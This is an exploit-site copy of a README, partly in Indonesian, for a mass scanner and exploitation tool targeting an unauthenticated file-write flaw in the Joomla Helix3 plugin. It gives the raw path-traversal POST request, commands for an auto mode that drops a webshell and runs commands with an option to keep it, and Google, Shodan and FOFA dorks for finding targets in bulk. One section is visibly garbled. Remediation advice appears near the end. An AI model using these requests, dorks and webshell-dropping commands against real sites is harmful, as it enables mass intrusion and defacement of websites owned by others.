Share
## https://sploitus.com/exploit?id=0A4A8A1D-1DB0-509B-80B1-2E6B781B8A8C
# CVE-2026-49049 β€” Helix3 (JoomShaper) Joomla Unauthenticated AJAX RCE Scanner

[![CVE](https://img.shields.io/badge/CVE-2026--49049-critical)](https://nvd.nist.gov/vuln/detail/CVE-2026-49049)
[![CVSS](https://img.shields.io/badge/CVSS-7.5_HIGH-orange)](https://nvd.nist.gov/vuln/detail/CVE-2026-49049)
[![Python](https://img.shields.io/badge/Python-3.9+-blue)](https://www.python.org/)
[![License](https://img.shields.io/badge/License-Educational-lightgrey)](#disclaimer)
[![Author](https://img.shields.io/badge/Author-ExDev994-black)](https://github.com/ExDev994)

Mass scanner / verifier for **CVE-2026-49049**: unauthenticated AJAX handler in the **Helix3 Framework** plugin for Joomla (**v1.0 – 3.1.0**, patched in **3.1.1+**).

> **Authorized testing only.** Use only on systems you own or have written permission to test.

---

## Table of Contents

- [Vulnerability Overview](#vulnerability-overview)
- [RCE Chain](#rce-chain)
- [Installation](#installation)
- [Cara Penggunaan (Usage)](#cara-penggunaan-usage)
- [Example Output](#example-output)
- [Reconnaissance Dorks](#reconnaissance-dorks)
- [Cara Fix (Remediation)](#cara-fix-remediation)
- [Project Structure](#project-structure)
- [Contributing](#contributing)
- [References](#references)
- [Disclaimer](#disclaimer)

---

## Vulnerability Overview

Handler `onAjaxHelix3()` in `plugins/ajax/helix3/helix3.php` is reachable via Joomla `com_ajax` **without authentication / CSRF token**:

```http
POST /index.php?option=com_ajax&plugin=helix3&format=json
Content-Type: application/x-www-form-urlencoded

data[action]=save&data[layoutName]=../../up.php&data[content]=
```

| Action | Impact | Versions |
|--------|--------|----------|
| `save` | Arbitrary JSON file write + **path traversal** | 1.0 – 3.1.0 |
| `remove` | Arbitrary file delete (no extension/path restriction) | 1.0 – 3.1.0 |
| `import` | Overwrite template params in DB (`custom_js` unescaped β†’ XSS/defacement) | v3.x only |

| Helix3 Version | save / remove | import | Status |
|----------------|---------------|--------|--------|
| 1.0 – 2.x | Vulnerable | Not present | Vulnerable |
| 3.0 – 3.1.0 | Vulnerable | Vulnerable | Vulnerable |
| **3.1.1+** | Patched | Patched | Safe |

---

## RCE Chain

Active mass-exploitation in the wild often drops a double-extension webshell:

1. Detect Helix3 + version `=2.31.0`, `colorama>=0.4.6`, Python 3.9+.

---

## Cara Penggunaan (Usage)

### 1. Siapkan target

Edit `targets.txt` β€” satu URL / host per baris (`#` = komentar). Path Joomla di-retain:

```text
# contoh
https://example.com/
https://example.com/joomla/
http://192.168.1.50/
```

### 2. Scan read-only (deteksi saja)

Tidak men-drop webshell. Cek version + probe `save` / `remove` / `import`:

```bash
python3 scan.py -f targets.txt --scan -o results.txt
```

### 3. Auto: detect + drop webshell + verify RCE

```bash
python3 scan.py -f targets.txt --auto -c "id" -o results.txt
```

### 4. Single target

```bash
python3 scan.py -t https://target.tld/joomla/ --auto -c "id"
```

### 5. Opsi lanjutan

```bash
# Keep webshell setelah verify (demo authorized)
python3 scan.py -f targets.txt --auto --keep

# Custom webshell name + traversal depths
python3 scan.py -f targets.txt --auto \
  --webshell-name up.php \
  --traversal-depths "../../,../../../"

# JSON report + concurrency
python3 scan.py -f targets.txt --auto -c "whoami" \
  --threads 20 --timeout 15 \
  -o results.txt --json report.json

# Proxy (Burp / etc)
python3 scan.py -t https://target.tld/ --scan --proxy http://127.0.0.1:8080
```

### Flags penting

| Flag | Deskripsi |
|------|-----------|
| `-f` / `--file` | File list target (default: `targets.txt` jika `-t` absen) |
| `-t` / `--target` | Single target URL |
| `--scan` | Read-only detect |
| `--auto` | Detect + RCE verify (default) |
| `-c` / `--cmd` | Command verify (default: `id`) |
| `-o` / `--output` | Result file β€” **hanya target VULN / SHELL_OK** |
| `--json` | Structured JSON report |
| `--keep` | Jangan auto-remove webshell setelah verify |
| `--threads` | Concurrent workers (default: 15) |
| `--timeout` | HTTP timeout detik (default: 15) |

> **Warning:** Mode `--auto` mencoba menulis webshell via path traversal. Default: webshell dihapus setelah verify. Gunakan `--keep` hanya untuk demo authorized.

---

## Example Output

**Terminal** menampilkan semua status (progress). **`results.txt` hanya berisi yang vuln:**

```text
[v] CVE-2026-49049 SHELL OK  https://target.tld  Helix3 2.5.6  save=Y remove=Y import=N
[id] -> uid=33(www-data) gid=33(www-data) groups=33(www-data)
    shell: https://target.tld/up.php.json?cmd=id
[ ] VULN (no shell)         https://target.tld  Helix3 3.0.2  save=Y remove=Y import=Y
```

Label lain (`PATCHED`, `NOT_HELIX3`, `TIMEOUT`, `UNKNOWN`) hanya di terminal, tidak masuk `results.txt`.

---

## Reconnaissance Dorks

Gunakan dork di bawah untuk menemukan aset Helix3 / Joomla yang berpotensi terdampak. **Hanya scan target yang diizinkan.**

### Google

```text
inurl:templates/shaper_helix3/templateDetails.xml
inurl:"templates/shaper_helix3"
"shaper_helix3" "Joomla"
inurl:index.php?option=com_ajax "helix3"
"powered by Helix" Joomla
intitle:"Home" "shaper_helix3"
inurl:/templates/helix3/
```

### Shodan

```text
http.html:"shaper_helix3"
http.html:"Helix3" http.html:"Joomla"
http.title:"Joomla" "shaper_helix3"
http.html:"/templates/shaper_helix3/"
http.html:"joomshaper" product:"Joomla"
html:"plg_system_helix3"
```

### FOFA

```text
body="shaper_helix3"
body="/templates/shaper_helix3/" && body="Joomla"
body="Helix3" && body="joomshaper"
body="plg_ajax_helix3" || body="onAjaxHelix3"
title="Joomla" && body="shaper_helix3"
body="templateDetails.xml" && body="helix3"
```

### Manual fingerprint (setelah dapat host)

```bash
# Version check
curl -sk 'https://TARGET/templates/shaper_helix3/templateDetails.xml' | grep -i version

# Unauth save probe (authorized only)
curl -sk -X POST \
  'https://TARGET/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'
```

---

## Cara Fix (Remediation)

### 1. Patch segera (wajib)

Update **System – Helix3 Framework** dan **Helix3 – Ajax** plugin ke **3.1.1 atau lebih baru** (disarankan **3.1.2**).

- Joomla backend β†’ System β†’ Update / Extensions
- Atau unduh paket resmi dari [JoomShaper](https://www.joomshaper.com/) dan install manual

### 2. Jika sudah di-compromise / deface

Update **tidak** membersihkan payload yang sudah masuk database.

1. Backend β†’ Site Template Styles β†’ template Helix3 aktif
2. Buka **Custom Code** β€” hapus script asing di Custom JavaScript / CSS / Before Head
3. Cek tabel `#__template_styles` kolom `params` untuk `custom_js` / `custom_css` injected
4. Hapus file mencurigakan di web root / templates / `tmp` / `media`:
   - `up.php.json`, `cox.json`, `*.php.json`, webshell lain
5. Rotate credentials admin, review user accounts, audit cron / scheduled tasks

Tanda compromise umum: defacement **"Hacked by AntonKill"** / **"trenggalek6etar"**, inject `custom_js`, file JSON tak dikenal.

### 3. Hardening (defense in depth)

**Apache** β€” jangan pakai `AddHandler` multi-ext; gunakan:

```apache

    SetHandler application/x-httpd-php

```

**Nginx:**

```nginx
location ~ \.php$ {
    try_files $uri =404;
    fastcgi_pass unix:/run/php/php-fpm.sock;
}
```

**PHP `php.ini`:**

```ini
disable_functions = system,exec,shell_exec,passthru,proc_open,popen,pcntl_exec
```

**Upload / file write:** regenerate nama file, tolak multi-dot extensions, `AllowOverride None` di directory publik.

### 4. Verifikasi setelah patch

```bash
python3 scan.py -t https://YOUR-SITE/ --scan
# Expected: PATCHED  Helix3 3.1.1+  (atau NOT_HELIX3 jika plugin di-uninstall)
```

---

## Project Structure

```text
CVE-2026-49049/
β”œβ”€β”€ scan.py              # CLI entry point
β”œβ”€β”€ core/
β”‚   β”œβ”€β”€ engine.py        # ThreadPoolExecutor + results (vuln-only to file)
β”‚   β”œβ”€β”€ probe.py         # Helix3 detect + save/remove/import + RCE drop
β”‚   └── target.py        # Parse / normalize targets.txt
β”œβ”€β”€ utils/
β”‚   └── banner.py
β”œβ”€β”€ targets.txt          # Input targets
β”œβ”€β”€ results.txt          # Generated (VULN / SHELL_OK only)
β”œβ”€β”€ requirements.txt
└── README.md
```

---

## Contributing

Kontribusi dari komunitas diterima. Maintainer: **[ExDev994](https://github.com/ExDev994)**.

### Cara contribute

1. Fork repo: https://github.com/ExDev994/CVE-2026-49049
2. Buat branch fitur: `git checkout -b feature/nama-fitur`
3. Commit perubahan yang jelas dan terfokus
4. Push branch: `git push origin feature/nama-fitur`
5. Buka **Pull Request** ke `main` dengan deskripsi:
   - Apa yang diubah
   - Kenapa
   - Cara test

### Guidelines

- Jangan commit target live / hasil scan / webshell / credential
- Jangan kurangi warning β€œauthorized testing only”
- Prefer PR kecil (satu concern per PR)
- Ikuti style Python yang sudah ada (`from __future__ import annotations`, type hints)
- Uji lokal: `python3 -m py_compile scan.py core/*.py utils/*.py` dan `python3 scan.py --help`

### Issues

Laporkan bug / request fitur di [Issues](https://github.com/ExDev994/CVE-2026-49049/issues). Sertakan:

- Versi Python & OS
- Command yang dijalankan
- Output / traceback (redact target sensitif)

### Contributors

| Contributor | Role |
|-------------|------|
| [ExDev994](https://github.com/ExDev994) | Author / Maintainer |

Vulnerability originally reported by **Phil Taylor** (mySites.guru). This repository is an independent scanner implementation and is **not** affiliated with JoomShaper or Open Source Matters.

---

## References

- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-49049
- Advisory (mySites.guru): https://mysites.guru/blog/helix3-security-update-changelog-failure/
- JoomShaper Helix3: https://www.joomshaper.com/
- Read-only PoC reference: https://github.com/shinthink/CVE-2026-49049
- This repo: https://github.com/ExDev994/CVE-2026-49049

---

## Disclaimer

This tool is for **educational** and **authorized security testing** purposes only.

Unauthorized access to computer systems is illegal and may violate laws including Indonesia **UU ITE**, the US CFAA, and equivalent statutes in other jurisdictions.

The author ([ExDev994](https://github.com/ExDev994)) assumes **no liability** for misuse. By using this software you accept full responsibility for your actions. Mode `--auto` drops a temporary webshell β€” use only on authorized targets.